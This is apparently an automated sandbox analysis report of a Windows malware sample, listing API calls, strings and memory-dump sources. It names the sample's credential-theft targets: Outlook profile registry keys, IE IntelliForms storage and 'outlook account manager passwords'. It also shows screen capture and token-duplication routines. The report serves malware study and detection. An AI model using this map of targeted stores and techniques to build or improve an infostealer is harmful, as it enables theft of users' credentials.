                                                          • EnumSystemLocalesW.KERNEL32(00457FCA,00000001,00485918,0000000C,002C86F9,00000000), ref: 002C825F
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: CriticalEnterEnumLocalesSectionSystem
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 002C6E7B: GetLastError.KERNEL32(?,00000000,?,002B47A1,00000000,00000000,?,?,002C0C4C,00000000,00000000,00000000,00000000,?), ref: 002C6E80
                                                            • Part of subcall function 002C6E7B: SetLastError.KERNEL32(00000000,004881C8,000000FF,?,002C0C4C,00000000,00000000,00000000,00000000,?), ref: 002C6F1E
                                                          • EnumSystemLocalesW.KERNEL32(00461F8C,00000001,009A9D6F,?,?,002D2A44,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 002D22BA
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: ErrorLast$EnumLocalesSystem
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00456C2B: GetLastError.KERNEL32(?,00000000,?,00444551,00000000,00000000,?,?,004509FC,00000000,00000000,00000000,00000000,?), ref: 00456C30
                                                            • Part of subcall function 00456C2B: SetLastError.KERNEL32(00000000,00000006,000000FF,?,004509FC,00000000,00000000,00000000,00000000,?), ref: 00456CCE
                                                          • EnumSystemLocalesW.KERNEL32(00461F8C,00000001,?,?,?,004627F4,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 0046206A
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: ErrorLast$EnumLocalesSystem
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,00455BDD,?,20001004,00000000,00000002,?,?,004551C8), ref: 00458638
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: InfoLocale
                                                          • String ID:
                                                          • API String ID: 2299586839-0
                                                          • Opcode ID: b3e8130d8cb80ebcc6fe6bec73e9cb4c6fc47ea098640436f101f52eb0180b2d
                                                          • Instruction ID: 70edc05e529363ee65d264a0e1ecd28dd17c889f09881c2226c81ca015f15853
                                                          • Opcode Fuzzy Hash: b3e8130d8cb80ebcc6fe6bec73e9cb4c6fc47ea098640436f101f52eb0180b2d
                                                          • Instruction Fuzzy Hash: 9CE01231500118B7CB122F51DC04EAE7A56EB44751F048029FC4565261DF758D2596D9
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: ErrorLastProcess_free$CurrentFeatureInfoLocalePresentProcessorTerminate
                                                          • String ID:
                                                          • API String ID: 4283097504-0
                                                          • Opcode ID: 9f37dfb9ddde3d43bb3be84e2d04d6ed0a1de22fc49922ce1be2303cbfa165a9
                                                          • Instruction ID: f7ad04968768fdec40822de10e72b5d93f72d68794dbbaf672da8d6f2c8151b1
                                                          • Opcode Fuzzy Hash: 9f37dfb9ddde3d43bb3be84e2d04d6ed0a1de22fc49922ce1be2303cbfa165a9
                                                          • Instruction Fuzzy Hash: 8DB1FB75620706ABDB389F65CC82BB773E9EF04308F54456FE94386A80EB74AD65CB10
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00433903: LoadLibraryA.KERNEL32(?), ref: 00433942
                                                            • Part of subcall function 00433903: GetProcAddress.KERNEL32(00000000,?), ref: 0043397D
                                                            • Part of subcall function 00433903: FreeLibrary.KERNEL32(00000000), ref: 004339B1
                                                            • Part of subcall function 00433D5D: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00433D82
                                                            • Part of subcall function 00433D5D: RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00433E13
                                                            • Part of subcall function 00433D5D: RegCloseKey.ADVAPI32(?), ref: 00433E20
                                                            • Part of subcall function 00433E2A: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00433E51
                                                            • Part of subcall function 00433E2A: RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00433E7C
                                                            • Part of subcall function 00433E2A: lstrlenW.KERNEL32(?), ref: 00433E93
                                                            • Part of subcall function 00433E2A: lstrlenW.KERNEL32(?), ref: 00433EA0
                                                            • Part of subcall function 00433E2A: lstrcpyW.KERNEL32(00000000,?), ref: 00433EC1
                                                            • Part of subcall function 00433E2A: lstrcatW.KERNEL32 ref: 00433ECD
                                                            • Part of subcall function 00433E2A: lstrcatW.KERNEL32 ref: 00433EDB
                                                            • Part of subcall function 00433E2A: lstrcatW.KERNEL32 ref: 00433EE7
                                                            • Part of subcall function 00433E2A: RegEnumKeyExW.ADVAPI32(?,?,?,000007FF,00000000,00000000,00000000,00000000), ref: 00433F21
                                                            • Part of subcall function 00433E2A: RegCloseKey.ADVAPI32(?), ref: 00433F36
                                                            • Part of subcall function 0043472B: RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Internet Explorer\IntelliForms\Storage2,00000000,00000100,00000100,?,00000000), ref: 00434773
                                                            • Part of subcall function 0043472B: RegQueryValueExW.ADVAPI32(00000100,?,00000000,?,00000000,00000000,?,00000000), ref: 00434792
                                                            • Part of subcall function 0043472B: RegQueryValueExW.ADVAPI32(00000100,?,00000000,00000000,00000000,00000000,?,00000000), ref: 004347CD
                                                            • Part of subcall function 0043472B: RegCloseKey.ADVAPI32(00000100,?,00000000), ref: 004347EE
                                                          • lstrlenW.KERNEL32(00000000), ref: 004341B2
                                                          • lstrcpyW.KERNEL32(00000000,00000000), ref: 004341CA
                                                          • lstrcpyW.KERNEL32(00000000,\Accounts), ref: 004341D6
                                                            • Part of subcall function 00433D5D: lstrlenW.KERNEL32(?), ref: 00433DA8
                                                            • Part of subcall function 00433D5D: lstrcpyW.KERNEL32(00000000,?), ref: 00433DC5
                                                            • Part of subcall function 00433D5D: lstrcatW.KERNEL32 ref: 00433DD1
                                                            • Part of subcall function 00433D5D: lstrcatW.KERNEL32 ref: 00433DDF
                                                            • Part of subcall function 00445491: _free.LIBCMT ref: 004454A4
                                                          Strings
                                                          • \Accounts, xrefs: 004341D0
                                                          • Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook, xrefs: 00434222
                                                          • Outlook, xrefs: 00434193
                                                          • Software\Microsoft\Internet Account Manager, xrefs: 00434198
                                                          • Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook, xrefs: 00434230
                                                          • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook, xrefs: 00434214
                                                          • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings, xrefs: 00434209
                                                          • Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook, xrefs: 0043425A
                                                          • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 0043416E
                                                          • Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook, xrefs: 0043427C
                                                          • Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook, xrefs: 0043424C
                                                          • \Software\Microsoft\Internet Account Manager\Accounts, xrefs: 0043417A
                                                          • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 004341F7
                                                          • Identities, xrefs: 00434184
                                                          • Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook, xrefs: 00434268
                                                          • Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook, xrefs: 0043423E
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: lstrcat$lstrcpylstrlen$CloseEnumOpen$LibraryQueryValue$AddressFreeLoadProc_free
                                                          • String ID: Identities$Outlook$Software\Microsoft\Internet Account Manager$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook$Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook$Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook$Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook$Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook$Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook$Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook$\Accounts$\Software\Microsoft\Internet Account Manager\Accounts
                                                          • API String ID: 527226083-92925148
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: _free$___from_strstr_to_strchr
                                                          • String ID:
                                                          • API String ID: 3409252457-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: _free$___from_strstr_to_strchr
                                                          • String ID:
                                                          • API String ID: 3409252457-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 0029573A
                                                          • GetDesktopWindow.USER32 ref: 0029576E
                                                          • GetWindowRect.USER32(00000000,?), ref: 0029577B
                                                          • GetWindowDC.USER32(00000000), ref: 00295782
                                                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 002957A2
                                                          • CreateCompatibleDC.GDI32(00000000), ref: 002957AB
                                                          • CreateDIBSection.GDI32(?,00000028,00000001,?,00000000,00000000), ref: 002957F6
                                                          • SaveDC.GDI32(00000000), ref: 00295816
                                                          • SelectObject.GDI32(00000000,?), ref: 00295822
                                                          • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 0029583B
                                                          • RestoreDC.GDI32(00000000,00000000), ref: 00295843
                                                          • _mbstowcs.LIBCMT ref: 002958EC
                                                          • DeleteObject.GDI32(00000010), ref: 0029592E
                                                            • Part of subcall function 0027F38E: _Deallocate.LIBCONCRT ref: 0027F39D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: Window$CreateObject$CapsCompatibleDeallocateDeleteDesktopDeviceH_prologRectRestoreSaveSectionSelect_mbstowcs
                                                          • String ID: (
                                                          • API String ID: 1791043667-3887548279
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 0029498F
                                                            • Part of subcall function 00278D2D: __EH_prolog.LIBCMT ref: 00278D32
                                                            • Part of subcall function 0027F171: _Deallocate.LIBCONCRT ref: 0027F186
                                                            • Part of subcall function 0027F38E: _Deallocate.LIBCONCRT ref: 0027F39D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: DeallocateH_prolog
                                                          • String ID: "\$)sbj$.4$3ixp$a1$ce6$hr(t$jfnk$m$p|tq$w${az`
                                                          • API String ID: 3708980276-828241358
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 0042473F
                                                            • Part of subcall function 00408ADD: __EH_prolog.LIBCMT ref: 00408AE2
                                                            • Part of subcall function 0040EF21: _Deallocate.LIBCONCRT ref: 0040EF36
                                                            • Part of subcall function 0040F13E: _Deallocate.LIBCONCRT ref: 0040F14D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: DeallocateH_prolog
                                                          • String ID: "\$)sbj$.4$3ixp$a1$ce6$hr(t$jfnk$m$p|tq$w${az`
                                                          • API String ID: 3708980276-828241358
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: _free$Info
                                                          • String ID:
                                                          • API String ID: 2509303402-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetModuleHandleExW.KERNEL32(00000006,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0044E549
                                                          • GetModuleFileNameW.KERNEL32(?,?,00000105,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0044E56D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: Module$FileHandleName
                                                          • String ID: (Press Retry to debug the application - JIT must be enabled)$...$<program name unknown>$Assertion failed!$Expression: $File: $For information on how your program can cause an assertionfailure, see the Visual C++ documentation on asserts$Line: $Program: $\
                                                          • API String ID: 4146042529-3261600717
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 002A7E26
                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 002A7E87
                                                          • Process32FirstW.KERNEL32(00000000,0000022C), ref: 002A7EA1
                                                          • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 002A7F15
                                                          • OpenProcessToken.ADVAPI32(00000000,000F01FF,?), ref: 002A7F27
                                                          • DuplicateTokenEx.ADVAPI32(?,000F01FF,00000000,00000002,00000001,?), ref: 002A7F42
                                                          • CloseHandle.KERNEL32(?), ref: 002A7F4F
                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 002A7F62
                                                          • _strlen.LIBCMT ref: 002A7F6F
                                                          • _mbstowcs.LIBCMT ref: 002A7F84
                                                          • CreateProcessWithTokenW.ADVAPI32(?,00000001,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 002A7F9E
                                                          • CloseHandle.KERNEL32(00000000), ref: 002A7FA5
                                                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 002A7FB7
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: ProcessToken$CloseCreateHandleOpenProcess32$DuplicateFileFirstH_prologModuleNameNextSnapshotToolhelp32With_mbstowcs_strlen
                                                          • String ID:
                                                          • API String ID: 1291480875-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • ___free_lconv_mon.LIBCMT ref: 002D160C
                                                            • Part of subcall function 002D0964: _free.LIBCMT ref: 002D0981
                                                            • Part of subcall function 002D0964: _free.LIBCMT ref: 002D0993
                                                            • Part of subcall function 002D0964: _free.LIBCMT ref: 002D09A5
                                                            • Part of subcall function 002D0964: _free.LIBCMT ref: 002D09B7
                                                            • Part of subcall function 002D0964: _free.LIBCMT ref: 002D09C9
                                                            • Part of subcall function 002D0964: _free.LIBCMT ref: 002D09DB
                                                            • Part of subcall function 002D0964: _free.LIBCMT ref: 002D09ED
                                                            • Part of subcall function 002D0964: _free.LIBCMT ref: 002D09FF
                                                            • Part of subcall function 002D0964: _free.LIBCMT ref: 002D0A11
                                                            • Part of subcall function 002D0964: _free.LIBCMT ref: 002D0A23
                                                            • Part of subcall function 002D0964: _free.LIBCMT ref: 002D0A35
                                                            • Part of subcall function 002D0964: _free.LIBCMT ref: 002D0A47
                                                            • Part of subcall function 002D0964: _free.LIBCMT ref: 002D0A59
                                                          • _free.LIBCMT ref: 002D1601
                                                            • Part of subcall function 002C7C93: HeapFree.KERNEL32(00000000,00000000), ref: 002C7CA9
                                                            • Part of subcall function 002C7C93: GetLastError.KERNEL32(?,?,002D10BB,?,00000000,?,00000002,?,002D135E,?,00000007,?,?,002D175F,?,?), ref: 002C7CBB
                                                          • _free.LIBCMT ref: 002D1623
                                                          • _free.LIBCMT ref: 002D1638
                                                          • _free.LIBCMT ref: 002D1643
                                                          • _free.LIBCMT ref: 002D1665
                                                          • _free.LIBCMT ref: 002D1678
                                                          • _free.LIBCMT ref: 002D1686
                                                          • _free.LIBCMT ref: 002D1691
                                                          • _free.LIBCMT ref: 002D16C9
                                                          • _free.LIBCMT ref: 002D16D0
                                                          • _free.LIBCMT ref: 002D16ED
                                                          • _free.LIBCMT ref: 002D1705
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                          • String ID:
                                                          • API String ID: 161543041-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00433860: lstrlenW.KERNEL32(?,?,004340B2), ref: 00433884
                                                            • Part of subcall function 00433860: lstrcpyW.KERNEL32(00000000,?), ref: 0043389B
                                                            • Part of subcall function 00433860: CoTaskMemFree.OLE32(?), ref: 004338A4
                                                          • lstrcmpiW.KERNEL32(00000000,identification,00000000), ref: 004340CA
                                                          • lstrcmpiW.KERNEL32(?,identitymgr), ref: 004340D8
                                                          • lstrcmpiW.KERNEL32(00000000,inetcomm server passwords), ref: 004340F8
                                                          • lstrcmpiW.KERNEL32(00000000,outlook account manager passwords), ref: 00434104
                                                          • lstrcmpiW.KERNEL32(00000000,identities), ref: 00434110
                                                          • CoTaskMemFree.OLE32(?), ref: 00434146
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: lstrcmpi$FreeTask$lstrcpylstrlen
                                                          • String ID: identification$identities$identitymgr$inetcomm server passwords$outlook account manager passwords
                                                          • API String ID: 1606502731-4287852900
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: _free
                                                          • String ID:
                                                          • API String ID: 269201875-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • IsInExceptionSpec.LIBVCRUNTIME ref: 002B34D3
                                                          • type_info::operator==.LIBVCRUNTIME ref: 002B34FA
                                                          • ___TypeMatch.LIBVCRUNTIME ref: 002B3606
                                                          • CatchIt.LIBVCRUNTIME ref: 002B365B
                                                          • IsInExceptionSpec.LIBVCRUNTIME ref: 002B36E1
                                                          • _UnwindNestedFrames.LIBCMT ref: 002B3768
                                                          • CallUnexpected.LIBVCRUNTIME ref: 002B3783
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: ExceptionSpec$CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                          • String ID: csm$csm$csm
                                                          • API String ID: 4234981820-393685449
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID: 0-3907804496
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetFileInformationByHandle.KERNEL32(?,?), ref: 002AC979
                                                          • GetFileSize.KERNEL32(?,00000000,?,?), ref: 002AC9F9
                                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?), ref: 002ACA10
                                                          • ReadFile.KERNEL32(?,?,00000002,?,00000000), ref: 002ACA23
                                                          • SetFilePointer.KERNEL32(?,00000024,00000000,00000000,?,?), ref: 002ACA30
                                                          • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 002ACA43
                                                          • SetFilePointer.KERNEL32(?,?,00000000,00000000,?,?), ref: 002ACA64
                                                          • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 002ACA77
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: File$PointerRead$HandleInformationSize
                                                          • String ID:
                                                          • API String ID: 2979504256-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetFileInformationByHandle.KERNEL32(?,?), ref: 0043C729
                                                          • GetFileSize.KERNEL32(?,00000000,?,?), ref: 0043C7A9
                                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?), ref: 0043C7C0
                                                          • ReadFile.KERNEL32(?,?,00000002,?,00000000), ref: 0043C7D3
                                                          • SetFilePointer.KERNEL32(?,00000024,00000000,00000000,?,?), ref: 0043C7E0
                                                          • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 0043C7F3
                                                          • SetFilePointer.KERNEL32(?,?,00000000,00000000,?,?), ref: 0043C814
                                                          • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 0043C827
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: File$PointerRead$HandleInformationSize
                                                          • String ID:
                                                          • API String ID: 2979504256-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00020019,?), ref: 002A40A1
                                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 002A40CC
                                                          • lstrlenW.KERNEL32(?), ref: 002A40E3
                                                          • lstrlenW.KERNEL32(?), ref: 002A40F0
                                                          • lstrcpyW.KERNEL32(00000000,?), ref: 002A4111
                                                          • lstrcatW.KERNEL32(00000000,0047DE0C), ref: 002A411D
                                                          • lstrcatW.KERNEL32(00000000,?), ref: 002A412B
                                                          • lstrcatW.KERNEL32(00000000,?), ref: 002A4137
                                                          • RegEnumKeyExW.ADVAPI32(?,?,?,000007FF,00000000,00000000,00000000,00000000), ref: 002A4171
                                                          • RegCloseKey.ADVAPI32(?), ref: 002A4186
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: lstrcat$Enumlstrlen$CloseOpenlstrcpy
                                                          • String ID:
                                                          • API String ID: 3646165539-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • _free.LIBCMT ref: 002C6D79
                                                            • Part of subcall function 002C7C93: HeapFree.KERNEL32(00000000,00000000), ref: 002C7CA9
                                                            • Part of subcall function 002C7C93: GetLastError.KERNEL32(?,?,002D10BB,?,00000000,?,00000002,?,002D135E,?,00000007,?,?,002D175F,?,?), ref: 002C7CBB
                                                          • _free.LIBCMT ref: 002C6D85
                                                          • _free.LIBCMT ref: 002C6D90
                                                          • _free.LIBCMT ref: 002C6D9B
                                                          • _free.LIBCMT ref: 002C6DA6
                                                          • _free.LIBCMT ref: 002C6DB1
                                                          • _free.LIBCMT ref: 002C6DBC
                                                          • _free.LIBCMT ref: 002C6DC7
                                                          • _free.LIBCMT ref: 002C6DD2
                                                          • _free.LIBCMT ref: 002C6DE0
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast
                                                          • String ID:
                                                          • API String ID: 776569668-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • _free.LIBCMT ref: 00456B29
                                                            • Part of subcall function 00457A43: HeapFree.KERNEL32(00000000,00000000), ref: 00457A59
                                                            • Part of subcall function 00457A43: GetLastError.KERNEL32(?,?,00460E6B,?,00000000,?,00000002,?,0046110E,?,00000007,?,?,0046150F,?,?), ref: 00457A6B
                                                          • _free.LIBCMT ref: 00456B35
                                                          • _free.LIBCMT ref: 00456B40
                                                          • _free.LIBCMT ref: 00456B4B
                                                          • _free.LIBCMT ref: 00456B56
                                                          • _free.LIBCMT ref: 00456B61
                                                          • _free.LIBCMT ref: 00456B6C
                                                          • _free.LIBCMT ref: 00456B77
                                                          • _free.LIBCMT ref: 00456B82
                                                          • _free.LIBCMT ref: 00456B90
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast
                                                          • String ID:
                                                          • API String ID: 776569668-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 002C6E7B: GetLastError.KERNEL32(?,00000000,?,002B47A1,00000000,00000000,?,?,002C0C4C,00000000,00000000,00000000,00000000,?), ref: 002C6E80
                                                            • Part of subcall function 002C6E7B: SetLastError.KERNEL32(00000000,004881C8,000000FF,?,002C0C4C,00000000,00000000,00000000,00000000,?), ref: 002C6F1E
                                                          • _memcmp.LIBVCRUNTIME ref: 002C5CE2
                                                          • _free.LIBCMT ref: 002C5D56
                                                          • _free.LIBCMT ref: 002C5D6F
                                                          • _free.LIBCMT ref: 002C5DAD
                                                          • _free.LIBCMT ref: 002C5DB6
                                                          • _free.LIBCMT ref: 002C5DC2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: _free$ErrorLast$_memcmp
                                                          • String ID: @$C
                                                          • API String ID: 4275183328-2800433787
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00294225
                                                          • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0029432F
                                                          • CloseHandle.KERNEL32(00000000), ref: 0029433E
                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 00294383
                                                          • ReadFile.KERNEL32(00000010,00000000,00000000,?,00000000), ref: 002943AE
                                                          • CloseHandle.KERNEL32(00000010), ref: 002943B5
                                                            • Part of subcall function 00279182: DeleteFileTransactedA.KERNEL32(?,00000000), ref: 002791AC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: File$CloseHandle$CreateDeleteH_prologReadSizeTransacted
                                                          • String ID: 4dUGGC[FP$H
                                                          • API String ID: 169828681-740961807
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: _strlen
                                                          • String ID: .arc$.arj$.gz$.lzh$.tgz$.zip$.zoo
                                                          • API String ID: 4218353326-51310709
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: _free
                                                          • String ID:
                                                          • API String ID: 269201875-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: _free
                                                          • String ID:
                                                          • API String ID: 269201875-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • wsprintfA.USER32 ref: 00289C73
                                                          • wsprintfA.USER32 ref: 00289C94
                                                          • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000010,00000000), ref: 00289CC3
                                                          • WriteFile.KERNEL32(?,?,00000000,000000FF,00000000), ref: 00289D35
                                                          • SetFileTime.KERNEL32(?,?,?,?), ref: 00289D6F
                                                          • CloseHandle.KERNEL32(?), ref: 00289D7F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: File$wsprintf$CloseCreateHandleTimeWrite
                                                          • String ID: :
                                                          • API String ID: 1593831391-336475711
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

